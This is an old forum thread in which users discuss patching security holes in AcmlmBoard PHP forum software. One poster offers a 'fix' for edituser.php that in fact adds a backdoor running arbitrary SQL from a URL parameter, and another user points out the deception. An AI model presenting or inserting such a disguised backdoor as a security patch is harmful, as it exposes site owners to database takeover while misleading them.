New link in the top of page "IRC Chat".
Register | Login
Views: 124468190
 Main | Memberlist | Active users | Calendar | Last Posts | IRC Chat | Online users
Ranks | FAQ | XPW | Stats | Color Chart | Photo album 		05-03-24 03:09 AM
0 users currently in Tech Discussion.
Xeogaming Forums - Tech Discussion - Holes in ABs | |
Next newer thread | Next older thread
User Post
coolman

Red Goomba








Since: 07-29-06

Since last post: 6397 days
Last activity: 6297 days
Posted on 09-13-06 08:28 AM Link | Quote
Well I been looking for holes in 1.A2 abs and exterminating them.
I cleared the holes in:
/lib/colors.php
/online.php

But I know there are others around like the one in "edituser.php",so any help?
Xkeeper









Since: 09-14-06

Since last post: 5708 days
Last activity: 5073 days
Posted on 09-14-06 08:25 AM Link | Quote
Find:
if($_POST[action]=='saveprofile'){

Replace with:
if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){


This should prevent people from executing arbitary code through it

(Last edited by Xkeeper_ on 09-14-06 11:26 AM)
coolman

Red Goomba








Since: 07-29-06

Since last post: 6397 days
Last activity: 6297 days
Posted on 09-14-06 08:26 AM Link | Quote
Where do I put that? What file?
Xkeeper









Since: 09-14-06

Since last post: 5708 days
Last activity: 5073 days
Posted on 09-14-06 08:30 AM Link | Quote
edituser.php.
coolman

Red Goomba








Since: 07-29-06

Since last post: 6397 days
Last activity: 6297 days
Posted on 09-14-06 08:31 AM Link | Quote
I thought the only hole in edituser.php was this:
Originally posted by smwedit
this is similar to what I use and it works

to prevent basic sql injection:
in edituser.php, find:
$birthday=mktime(0,0,0,$bmonth,$bday,$byear);
add above it:
$numposts = intval($numposts);
$pemail = intval($pemail);
$powerlevel = intval($powerlevel);
$posttool = intval($posttool);
$useranks = intval($useranks);
$userid = intval($userid);
$postsperpage = intval($postsperpage);
$threadsperpage = intval($postsperpage);
$timezone = intval($timezone);
$icq = intval($icq);
$sex = intval($sex);
and to prevent auto submitting:
find:
$inph=userid VALUE=$id>
add above or under it:
$inph=thepass VALUE='$loguser[password]'>
and find:
if($_POST[action]=='saveprofile'){
change it to:
if($_POST[action]=='saveprofile' and $thepass==$loguser[password]){


But meh that board isnt for me,is for neighboor who is going to use it for pet selling and stuff


EDIT: WTF,that code does nothing.Instead I think it makes the board more vulnerable.

(Last edited by coolman on 09-14-06 11:34 AM)
Xkeeper









Since: 09-14-06

Since last post: 5708 days
Last activity: 5073 days
Posted on 09-14-06 08:41 AM Link | Quote
Of course it's going to do nothing, security patches usually don't show any change in board operation (unless you're trying something).

Seriously, that's probably the major hole as it ghas no sort of check to make sure that you aren't loading edituser via a malicious form someone set up for you.
coolman

Red Goomba








Since: 07-29-06

Since last post: 6397 days
Last activity: 6297 days
Posted on 09-14-06 08:43 AM Link | Quote
I think you meant:
if($_POST[action]=='saveprofile' and $thepass==$loguser[password]){

that^

And not:
if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){

That code opens a big hole in edituser.php
Xkeeper









Since: 09-14-06

Since last post: 5708 days
Last activity: 5073 days
Posted on 09-14-06 08:51 AM Link | Quote
Would I use it myself if it didn't fix things? Jeez...

coolman

Red Goomba








Since: 07-29-06

Since last post: 6397 days
Last activity: 6297 days
Posted on 09-14-06 08:55 AM Link | Quote
...

Will do because I dont care,its my neighboor's board and I dont care if alot of idiots spam his pet board...

Now I wonder why he asked me to code some feautures to it...
And why he doesnt uses phpbb instead which has less holes.

Any more holes xkeeper?
Xkeeper









Since: 09-14-06

Since last post: 5708 days
Last activity: 5073 days
Posted on 09-14-06 08:55 AM Link | Quote
Not off the top of my head, no.
coolman

Red Goomba








Since: 07-29-06

Since last post: 6397 days
Last activity: 6297 days
Posted on 09-14-06 09:00 AM Link | Quote
Thanks for all the help xkeeper.I must say your very good in faking,yeah you faked a code and even took your time to prove with a pic,but im not stupid,that code does nothing.Also:
http://xkeeper.acmlm.org/board/thread.php?id=252&page=1

Saw you there
Another note:You waste your time because im working on nothing.I have no site in progress.If you see all those help threads you will se they are old.

I only made this thread so I knew the holes from which they hacked tnf.

So thank you for wasting your time.
Have a nice day
The Accidental Protege

Iggy Koopa
I\"m your accidental protege...
The gift, the blood, the thrownaway...\"










Since: 03-08-05
From: Marching on the city of Southern Cross

Since last post: 963 days
Last activity: 963 days
Posted on 09-14-06 10:02 AM Link | Quote
I don't like where this is going....
coolman, don't piss him off. Please.
Things.... have been known to happen to boards that piss him off...
Just let him go...
Next newer thread | Next older thread
Xeogaming Forums - Tech Discussion - Holes in ABs |



xeogaming.org

AcmlmBoard 1.92++ r4 Baseline
?2000-2013 Acmlm, Emuz, Blades, Xkeeper, DarkSlaya*, Lord Alexandor*
*Unofficial Updates
Page rendered in 0.183 seconds.
0.044